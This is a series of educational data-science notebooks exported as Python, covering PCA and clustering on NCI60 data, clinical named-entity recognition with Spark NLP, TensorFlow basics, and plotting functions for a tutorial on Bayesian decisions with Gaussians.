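    return v, spike_times
```

Comparing terms with the simplified model, the leak plays the role of $\beta = dt/(R_m C_m)$ and the input scaling that of $\alpha = dt/C_m$.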
|
tutorials/W1D1_ModelTypes/student/W1D1_Tutorial2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# imports and setup
# %matplotlib inline
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
pd.set_option('display.precision', 4) # number precision for pandas
pd.set_option('display.max_rows', 50)
pd.set_option('display.max_columns', 20)
pd.set_option('display.float_format', '{:20,.4f}'.format) # get rid of scientific notation
plt.style.use('seaborn') # pretty matplotlib plots
# +
nci60 = pd.read_csv('../datasets/NCI60.csv', index_col=0)
nci_labs = nci60.labs
nci_data = nci60.drop('labs', axis=1)
nci_data.head()
# -
nci_labs.head()
nci_labs.value_counts()
# # 10.6.1 PCA on the NCI60 Data
# +
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
nci_scaled = scaler.fit_transform(nci_data)
pca = PCA()
pca.fit(nci_scaled)
# -
x = pca.transform(nci_scaled)
# +
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
color_index = le.fit_transform(nci_labs)
# +
f, axes = plt.subplots(1, 2, sharex=False, sharey=False)
f.set_figheight(8)
f.set_figwidth(16)
axes[0].scatter(x[:, 0], -x[:, 1], c=color_index, cmap='Spectral')
axes[0].set_xlabel('Z1')
axes[0].set_ylabel('Z2')
axes[1].scatter(x[:, 0], x[:, 2], c=color_index, cmap='Spectral')
axes[1].set_xlabel('Z1')
axes[1].set_ylabel('Z3');
# -
pca.explained_variance_ratio_[:5]
pca.explained_variance_ratio_.cumsum()[:5]
# +
from scikitplot.decomposition import plot_pca_component_variance
f, axes = plt.subplots(1, 2, sharex=False, sharey=False)
f.set_figheight(6)
f.set_figwidth(14)
axes[0].plot(pca.explained_variance_ratio_, marker='o', markeredgewidth=1, markerfacecolor='None')
axes[0].set_title('PVE')
plot_pca_component_variance(pca, ax=axes[1]);
# -
# # 10.6.2 Clustering the Observations of the NCI60 Data
# +
from scipy.cluster.hierarchy import dendrogram, linkage, cut_tree
f, axes = plt.subplots(3, 1, sharex=False, sharey=False)
f.set_figheight(24)
f.set_figwidth(16)
dendrogram(linkage(nci_scaled, method='complete'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6,
ax=axes[0])
dendrogram(linkage(nci_scaled, method='average'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6,
ax=axes[1])
dendrogram(linkage(nci_scaled, method='single'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6,
ax=axes[2])
axes[0].set_title('Complete Linkage', size=16)
axes[1].set_title('Average Linkage', size=16)
axes[2].set_title('Single Linkage', size=16);
# +
hc_clusters = cut_tree(linkage(nci_scaled, method='complete'), 4).ravel()
pd.crosstab(hc_clusters, nci_labs)
# +
plt.figure(figsize=(16, 10))
dendrogram(linkage(nci_scaled, method='complete'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6)
plt.axhline(y=139, c='r')
plt.title('Complete Linkage', size=16);
# +
from sklearn.cluster import KMeans
km = KMeans(n_clusters=4, n_init=20, random_state=42)
km.fit(nci_scaled)
pd.crosstab(km.labels_, hc_clusters)
# +
hc2 = linkage(x[:, 0:5], method='complete')
plt.figure(figsize=(16, 10))
dendrogram(hc2,
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6)
plt.title('Hierarchical Clustering on First Five Score Vectors', size=16);
# -
pd.crosstab(cut_tree(hc2, 4).ravel(), nci_labs)
|
labs_emredjan/labs/lab_10.5_NCI60_data_example.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: spark_nlp_2.4.4
# language: python
# name: spark_nlp_2.4.4
# ---
# +
import sparknlp_jsl # licensed version of Spark NLP
import sparknlp
spark = sparknlp_jsl.start("xxxx") # xxxx is a secret key. If you don't have it, please get in touch with JSL.
print("Spark NLP version: ", sparknlp.version())
print("Apache Spark version: ", spark.version)
# -
# Notebook from this article https://www.johnsnowlabs.com/explain-clinical-document-spark-nlp-pretrained-pipeline/
# Loading the pretrained clinical pipeline ("explain_clinical_doc_dl"). It has the following annotators inside.
#
# - Tokenizer
# - Sentence Detector
# - Clinical Word Embeddings (glove trained on pubmed dataset)
# - Clinical NER-DL (trained by SOTA algorithm on i2b2 dataset)
# - AssertionDL model (trained by SOTA algorithm on i2b2 dataset)
# +
from pyspark.ml import PipelineModel
pretrained_model = PipelineModel.load("clinical/models/explain_clinical_doc_dl")
# -
# ### with LightPipeline
# +
from sparknlp.base import LightPipeline
ner_lightModel = LightPipeline(pretrained_model)
# -
clinical_text = """
Patient with severe fever and sore throat.
He shows no stomach pain and he maintained on an epidural and PCA for pain control.
He also became short of breath with climbing a flight of stairs.
After CT, lung tumour located at the right lower lobe. Father with Alzheimer.
"""
result = ner_lightModel.annotate(clinical_text)
result.keys()
list(zip(result['token'],result['ner']))
result = ner_lightModel.annotate(clinical_text)
list(zip(result['ner_chunk'],result['assertion']))
# +
# %%time
result = ner_lightModel.fullAnnotate(clinical_text)
entity_tuples = [(n.result, n.metadata['entity'], m.result, n.begin, n.end) for n,m in zip(result[0]['ner_chunk'],result[0]['assertion'])]
# -
entity_tuples
# +
import pandas as pd
pd.DataFrame(entity_tuples, columns=["phrase","entity","assertion","start","end"])
# -
# ## with Spark dataframes
# +
data = spark.createDataFrame([
    ["Patient with severe fever and sore throat"],
["Patient shows no stomach pain"],
["She was maintained on an epidural and PCA for pain control."],
["He also became short of breath with climbing a flight of stairs."],
["Lung tumour located at the right lower lobe"],
["Father with Alzheimer."]
]).toDF("text")
data.show(truncate=False)
# -
pretrained_model.transform(data).show()
pretrained_model.transform(data).select("token.result","ner.result").show(truncate=False)
pretrained_model.transform(data).select("ner_chunk.result", "assertion.result").show(truncate=False)
|
tutorials/blogposts/2.clinical_entity_extraction_with_assertion.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ___
#
# <a href='http://www.pieriandata.com'> <img src='../Pierian_Data_Logo.png' /></a>
# ___
# # TensorFlow Basics
#
# Remember to reference the video for full explanations; this is just a notebook for code reference.
#
# You can import the library:
import tensorflow as tf
print(tf.__version__)
# ### Simple Constants
#
# Let's show how to create a simple constant with Tensorflow, which TF stores as a tensor object:
hello = tf.constant('Hello World')
type(hello)
x = tf.constant(100)
type(x)
# ### Running Sessions
#
# Now you can create a TensorFlow Session, which is a class for running TensorFlow operations.
#
# A `Session` object encapsulates the environment in which `Operation`
# objects are executed, and `Tensor` objects are evaluated. For example:
sess = tf.Session()
sess.run(hello)
type(sess.run(hello))
sess.run(x)
type(sess.run(x))
# ## Operations
#
# You can line up multiple TensorFlow operations to be run during a session:
x = tf.constant(2)
y = tf.constant(3)
with tf.Session() as sess:
print('Operations with Constants')
print('Addition',sess.run(x+y))
print('Subtraction',sess.run(x-y))
print('Multiplication',sess.run(x*y))
print('Division',sess.run(x/y))
# ### Placeholder
#
# You may not always have the constants right away, and you may be waiting for a constant to appear after a cycle of operations. **tf.placeholder** is a tool for this. It inserts a placeholder for a tensor that will always be fed.
#
# **Important**: This tensor will produce an error if evaluated. Its value must be fed using the `feed_dict` optional argument to `Session.run()`,
# `Tensor.eval()`, or `Operation.run()`. For example, for a placeholder of a matrix of floating point numbers:
#
# x = tf.placeholder(tf.float32, shape=(1024, 1024))
#
# Here is an example for integer placeholders:
x = tf.placeholder(tf.int32)
y = tf.placeholder(tf.int32)
x
type(x)
# ### Defining Operations
add = tf.add(x,y)
sub = tf.subtract(x,y)
mul = tf.multiply(x,y)
# Running operations with variable input:
d = {x:20,y:30}
with tf.Session() as sess:
print('Operations with Constants')
print('Addition',sess.run(add,feed_dict=d))
print('Subtraction',sess.run(sub,feed_dict=d))
print('Multiplication',sess.run(mul,feed_dict=d))
# Now let's see an example of a more complex operation, using Matrix Multiplication. First we need to create the matrices:
import numpy as np
# Make sure to use floats here, int64 will cause an error.
a = np.array([[5.0,5.0]])
b = np.array([[2.0],[2.0]])
a
a.shape
b
b.shape
mat1 = tf.constant(a)
mat2 = tf.constant(b)
# The matrix multiplication operation:
matrix_multi = tf.matmul(mat1,mat2)
# Now run the session to perform the Operation:
with tf.Session() as sess:
result = sess.run(matrix_multi)
print(result)
# That is all for now! Next we will expand these basic concepts to construct our own Multi-Layer Perceptron model!
# # Great Job!
|
Udemy/Refactored_Py_DS_ML_Bootcamp-master/22-Deep Learning/01-Tensorflow Basics.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.7.10 64-bit (''nma'': conda)'
# name: python3710jvsc74a57bd03e19903e646247cead5404f55ff575624523d45cf244c3f93aaf5fa10367032a
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W3D1_BayesianDecisions/W3D1_Tutorial2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# -
# # Tutorial 2: Bayesian inference and decisions with continuous hidden state
# **Week 3, Day 1: Bayesian Decisions**
#
# **By Neuromatch Academy**
#
# __Content creators:__ <NAME>, <NAME>, <NAME>, <NAME>
#
# __Content reviewers:__
# # Tutorial Objectives
#
# This notebook introduces you to Gaussians and Bayes' rule for continuous distributions, allowing us to model simple but powerful combinations of prior information and new measurements. You will work through the same ideas we explored in the binary state tutorial, but applied to a new problem: finding and guiding Astrocat! You will see this problem again in more complex ways in the following days.
#
# In this notebook, you will:
#
# 1. Learn about the Gaussian distribution and its nice properties
# 2. Explore how we can extend the ideas from the binary hidden state tutorial to continuous distributions
# 3. Explore how different priors can produce more complex posteriors
# 4. Explore loss functions often used in inference, and more complex utility functions
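Several plotting helpers later in this tutorial call a `product_guassian(mu1, mu2, sigma1, sigma2)` utility that returns the mean and standard deviation of the normalized product of two Gaussian densities. For reference, here is a minimal standalone sketch of that identity, under our own name and implementation (it is not the notebook's definition): precisions add, and the posterior mean is the precision-weighted average of the two means.

```python
import numpy as np

def product_of_gaussians(mu1, mu2, sigma1, sigma2):
    """Mean and std of the normalized product of N(mu1, sigma1^2)
    and N(mu2, sigma2^2)."""
    j1, j2 = 1.0 / sigma1**2, 1.0 / sigma2**2  # precisions
    mu_post = (j1 * mu1 + j2 * mu2) / (j1 + j2)
    sigma_post = np.sqrt(1.0 / (j1 + j2))
    return mu_post, sigma_post
```

With equal widths the posterior mean sits halfway between the two inputs, and the posterior is always narrower than either of them.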
# ---
# ## Setup
# Please execute the cells below to initialize the notebook environment.
# imports
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import multivariate_normal
from scipy.stats import gamma as gamma_distribution
from matplotlib.transforms import Affine2D
# + cellView="form"
#@title Figure Settings
# %matplotlib inline
# %config InlineBackend.figure_format = 'retina'
import ipywidgets as widgets
from ipywidgets import FloatSlider
from ipywidgets import interact, fixed, HBox, Layout, VBox, interactive, Label
plt.style.use("https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/nma.mplstyle")
import warnings
warnings.filterwarnings("ignore")
# + cellView="form"
# @title Plotting functions
def plot_gaussian(μ, σ):
x = np.linspace(-7, 7, 1000, endpoint=True)
y = gaussian(x, μ, σ)
plt.figure(figsize=(6, 4))
plt.plot(x, y, c='blue')
plt.fill_between(x, y, color='b', alpha=0.2)
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.yticks([])
plt.show()
def plot_losses(μ, σ):
x = np.linspace(-2, 2, 400, endpoint=True)
y = gaussian(x, μ, σ)
error = x - μ
mse_loss = (error)**2
abs_loss = np.abs(error)
    zero_one_loss = (np.abs(error) >= 0.02).astype(float)  # np.float alias is removed in recent NumPy
fig, (ax_gaus, ax_error) = plt.subplots(2, 1, figsize=(6, 8))
ax_gaus.plot(x, y, color='blue', label='true distribution')
ax_gaus.fill_between(x, y, color='blue', alpha=0.2)
ax_gaus.set_ylabel('$\\mathcal{N}(x, \\mu, \\sigma^2)$')
ax_gaus.set_xlabel('x')
ax_gaus.set_yticks([])
ax_gaus.legend(loc='upper right')
ax_error.plot(x, mse_loss, color='c', label='Mean Squared Error', linewidth=3)
ax_error.plot(x, abs_loss, color='m', label='Absolute Error', linewidth=3)
ax_error.plot(x, zero_one_loss, color='y', label='Zero-One Loss', linewidth=3)
ax_error.legend(loc='upper right')
ax_error.set_xlabel('$\\hat{\\mu}$')
ax_error.set_ylabel('Error')
plt.show()
def plot_mvn2d(mu1, mu2, sigma1, sigma2, corr):
x, y = np.mgrid[-2:2:.02, -2:2:.02]
cov12 = corr * sigma1 * sigma2
z = mvn2d(x, y, mu1, mu2, sigma1, sigma2, cov12)
plt.figure(figsize=(6, 6))
plt.contourf(x, y, z, cmap='Reds')
plt.axis("off")
plt.show()
def plot_marginal(sigma1, sigma2, c_x, c_y, corr):
mu1, mu2 = 0.0, 0.0
cov12 = corr * sigma1 * sigma2
xx, yy = np.mgrid[-2:2:.02, -2:2:.02]
x, y = xx[:, 0], yy[0]
p_x = gaussian(x, mu1, sigma1)
p_y = gaussian(y, mu2, sigma2)
zz = mvn2d(xx, yy, mu1, mu2, sigma1, sigma2, cov12)
mu_x_y = mu1+cov12*(c_y-mu2)/sigma2**2
mu_y_x = mu2+cov12*(c_x-mu1)/sigma1**2
    # conditional stds: Var(x|y) = sigma1^2 - cov12^2/sigma2^2, and vice versa
    sigma_x_y = np.sqrt(sigma1**2 - cov12**2/sigma2**2)
    sigma_y_x = np.sqrt(sigma2**2 - cov12**2/sigma1**2)
p_x_y = gaussian(x, mu_x_y, sigma_x_y)
p_y_x = gaussian(x, mu_y_x, sigma_y_x)
p_c_y = gaussian(mu_x_y-sigma_x_y, mu_x_y, sigma_x_y)
p_c_x = gaussian(mu_y_x-sigma_y_x, mu_y_x, sigma_y_x)
# definitions for the axes
left, width = 0.1, 0.65
bottom, height = 0.1, 0.65
spacing = 0.01
rect_z = [left, bottom, width, height]
rect_x = [left, bottom + height + spacing, width, 0.2]
rect_y = [left + width + spacing, bottom, 0.2, height]
# start with a square Figure
fig = plt.figure(figsize=(8, 8))
ax_z = fig.add_axes(rect_z)
ax_x = fig.add_axes(rect_x, sharex=ax_z)
ax_y = fig.add_axes(rect_y, sharey=ax_z)
ax_z.set_axis_off()
ax_x.set_axis_off()
ax_y.set_axis_off()
ax_x.set_xlim(np.min(x), np.max(x))
ax_y.set_ylim(np.min(y), np.max(y))
ax_z.contourf(xx, yy, zz, cmap='Greys')
ax_z.hlines(c_y, mu_x_y-sigma_x_y, mu_x_y+sigma_x_y, color='c', zorder=9, linewidth=3)
ax_z.vlines(c_x, mu_y_x-sigma_y_x, mu_y_x+sigma_y_x, color='m', zorder=9, linewidth=3)
ax_x.plot(x, p_x, label='$p(x)$', c = 'b', linewidth=3)
ax_x.plot(x, p_x_y, label='$p(x|y = C_y)$', c = 'c', linestyle='dashed', linewidth=3)
ax_x.hlines(p_c_y, mu_x_y-sigma_x_y, mu_x_y+sigma_x_y, color='c', linestyle='dashed', linewidth=3)
ax_y.plot(p_y, y, label='$p(y)$', c = 'r', linewidth=3)
ax_y.plot(p_y_x, y, label='$p(y|x = C_x)$', c = 'm', linestyle='dashed', linewidth=3)
ax_y.vlines(p_c_x, mu_y_x-sigma_y_x, mu_y_x+sigma_y_x, color='m', linestyle='dashed', linewidth=3)
ax_x.legend(loc="upper left", frameon=False)
ax_y.legend(loc="lower right", frameon=False)
plt.show()
def plot_bayes(mu1, mu2, sigma1, sigma2):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
plt.figure(figsize=(8, 6))
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.show()
def plot_information(mu1, sigma1, mu2, sigma2):
x = np.linspace(-7, 7, 1000, endpoint=True)
mu3, sigma3 = product_guassian(mu1, mu2, sigma1, sigma2)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
posterior = gaussian(x, mu3, sigma3)
plt.figure(figsize=(8, 6))
plt.plot(x, prior, c='b', label='Satellite')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='Space Mouse')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='Center')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.show()
def plot_information_global(mu3, sigma3, mu1, mu2):
x = np.linspace(-7, 7, 1000, endpoint=True)
sigma1, sigma2 = reverse_product(mu3, sigma3, mu1, mu2)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
posterior = gaussian(x, mu3, sigma3)
plt.figure(figsize=(8, 6))
plt.plot(x, prior, c='b', label='Satellite')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='Space Mouse')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='Center')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.ylabel('$\mathcal{N}(x, \mu, \sigma^2)$')
plt.xlabel('x')
plt.show()
def plot_loss_utility_gaussian(loss_f, mu, sigma, mu_true):
x = np.linspace(-7, 7, 1000, endpoint=True)
posterior = gaussian(x, mu, sigma)
plot_loss_utility(x, posterior, loss_f, mu_true)
def plot_loss_utility_mixture(loss_f, mu1, mu2, sigma1, sigma2, factor, mu_true):
x = np.linspace(-7, 7, 1000, endpoint=True)
y_1 = gaussian(x, mu1, sigma1)
y_2 = gaussian(x, mu2, sigma2)
posterior = y_1 * factor + y_2 * (1.0 - factor)
plot_loss_utility(x, posterior, loss_f, mu_true)
def plot_loss_utility(x, posterior, loss_f, mu_true):
mean, median, mode = calc_mean_mode_median(x, posterior)
loss = calc_loss_func(loss_f, mu_true, x)
utility = calc_expected_loss(loss_f, posterior, x)
min_expected_loss = x[np.argmin(utility)]
plt.figure(figsize=(12, 8))
plt.subplot(2, 2, 1)
plt.title("Probability")
plt.plot(x, posterior, c='b')
plt.fill_between(x, posterior, color='b', alpha=0.2)
plt.yticks([])
plt.xlabel('x')
plt.ylabel('$\pi \cdot p(x) + (1-\pi) \cdot p(y)$')
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.subplot(2, 2, 2)
plt.title(loss_f)
plt.plot(x, loss, c='c', label=loss_f)
# plt.fill_between(x, loss, color='c', alpha=0.2)
plt.ylabel('loss')
# plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(2, 2, 3)
plt.title("Expected Loss")
plt.plot(x, utility, c='y', label='$\mathbb{E}[L]$')
plt.axvline(min_expected_loss, ls='dashed', color='red', label='$Min~ \mathbb{E}[Loss]$')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.legend(loc="lower right")
plt.xlabel('x')
plt.ylabel('$\mathbb{E}[L]$')
plt.show()
def plot_loss_utility_bayes(mu1, mu2, sigma1, sigma2, mu_true, loss_f):
x = np.linspace(-4, 4, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
loss = calc_loss_func(loss_f, mu_true, x)
utility = - calc_expected_loss(loss_f, posterior, x)
plt.figure(figsize=(18, 5))
plt.subplot(1, 3, 1)
plt.title("Posterior distribution")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.subplot(1, 3, 2)
plt.title(loss_f)
plt.plot(x, loss, c='c')
# plt.fill_between(x, loss, color='c', alpha=0.2)
plt.ylabel('loss')
plt.subplot(1, 3, 3)
plt.title("Expected utility")
plt.plot(x, utility, c='y', label='utility')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.legend(loc="upper left")
plt.show()
def plot_simple_utility_gaussian(mu, sigma, mu_g, mu_c, sigma_g, sigma_c):
x = np.linspace(-7, 7, 1000, endpoint=True)
posterior = gaussian(x, mu, sigma)
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plt.figure(figsize=(18, 5))
plt.subplot(1, 3, 1)
plt.title("Probability")
plt.plot(x, posterior, c='b', label='posterior')
plt.fill_between(x, posterior, color='b', alpha=0.2)
plt.yticks([])
# plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(1, 3, 2)
plt.title("utility function")
plt.plot(x, gain, c='m', label='gain')
# plt.fill_between(x, gain, color='m', alpha=0.2)
plt.plot(x, -loss, c='c', label='loss')
# plt.fill_between(x, -loss, color='c', alpha=0.2)
plt.legend(loc="upper left")
plt.subplot(1, 3, 3)
plt.title("expected utility")
plt.plot(x, utility, c='y', label='utility')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.legend(loc="upper left")
plt.show()
def plot_utility_gaussian(mu1, mu2, sigma1, sigma2, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_utility_mixture(mu_m1, mu_m2, sigma_m1, sigma_m2, factor,
mu, sigma, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
y_1 = gaussian(x, mu_m1, sigma_m1)
y_2 = gaussian(x, mu_m2, sigma_m2)
prior = y_1 * factor + y_2 * (1.0 - factor)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_utility_uniform(mu, sigma, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = np.ones_like(x) / (x.max() - x.min())
likelihood = gaussian(x, mu, sigma)
posterior = likelihood
# posterior = np.multiply(prior, likelihood)
# posterior = posterior / (posterior.sum() * (x[1] - x[0]))
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_utility_gamma(alpha, beta, offset, mu, sigma, mu_g, mu_c, sigma_g, sigma_c, plot_utility_row=True):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gamma_pdf(x-offset, alpha, beta)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
if plot_utility_row:
gain = gaussian(x, mu_g, sigma_g)
loss = gaussian(x, mu_c, sigma_c)
utility = np.multiply(posterior, gain) - np.multiply(posterior, loss)
plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility)
else:
plot_bayes_row(x, prior, likelihood, posterior)
return None
def plot_bayes_row(x, prior, likelihood, posterior):
mean, median, mode = calc_mean_mode_median(x, posterior)
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.title("Prior and likelihood distribution")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
# plt.plot(x, posterior, c='k', label='posterior')
# plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.subplot(1, 2, 2)
plt.title("Posterior distribution")
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.1)
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.yticks([])
plt.xlabel('x')
plt.show()
def plot_bayes_utility_rows(x, prior, likelihood, posterior, gain, loss, utility):
mean, median, mode = calc_mean_mode_median(x, posterior)
max_utility = x[np.argmax(utility)]
plt.figure(figsize=(12, 8))
plt.subplot(2, 2, 1)
plt.title("Prior and likelihood distribution")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
# plt.plot(x, posterior, c='k', label='posterior')
# plt.fill_between(x, posterior, color='k', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.subplot(2, 2, 2)
plt.title("Posterior distribution")
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.1)
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.yticks([])
plt.xlabel('x')
plt.subplot(2, 2, 3)
plt.title("utility function")
plt.plot(x, gain, c='m', label='gain')
# plt.fill_between(x, gain, color='m', alpha=0.2)
plt.plot(x, -loss, c='c', label='loss')
# plt.fill_between(x, -loss, color='c', alpha=0.2)
plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(2, 2, 4)
plt.title("expected utility")
plt.plot(x, utility, c='y', label='utility')
# plt.fill_between(x, utility, color='y', alpha=0.2)
plt.axvline(max_utility, ls='dashed', color='red', label='Max utility')
plt.legend(loc="upper left")
plt.xlabel('x')
plt.ylabel('utility')
plt.legend(loc="lower right")
plt.show()
def gaussian_mixture(mu1, mu2, sigma1, sigma2, factor):
assert 0.0 < factor < 1.0
x = np.linspace(-7.0, 7.0, 1000, endpoint=True)
y_1 = gaussian(x, mu1, sigma1)
y_2 = gaussian(x, mu2, sigma2)
mixture = y_1 * factor + y_2 * (1.0 - factor)
plt.figure(figsize=(8, 6))
plt.plot(x, y_1, c='deepskyblue', label='p(x)', linewidth=3.0)
plt.fill_between(x, y_1, color='deepskyblue', alpha=0.2)
plt.plot(x, y_2, c='aquamarine', label='p(y)', linewidth=3.0)
plt.fill_between(x, y_2, color='aquamarine', alpha=0.2)
plt.plot(x, mixture, c='b', label='$\pi \cdot p(x) + (1-\pi) \cdot p(y)$', linewidth=3.0)
plt.fill_between(x, mixture, color='b', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.show()
def plot_bayes_loss_utility_gaussian(loss_f, mu_true, mu1, mu2, sigma1, sigma2):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gaussian(x, mu1, sigma1)
likelihood = gaussian(x, mu2, sigma2)
mu_post, sigma_post = product_guassian(mu1, mu2, sigma1, sigma2)
posterior = gaussian(x, mu_post, sigma_post)
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility_uniform(loss_f, mu_true, mu, sigma):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = np.ones_like(x) / (x.max() - x.min())
likelihood = gaussian(x, mu, sigma)
posterior = likelihood
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
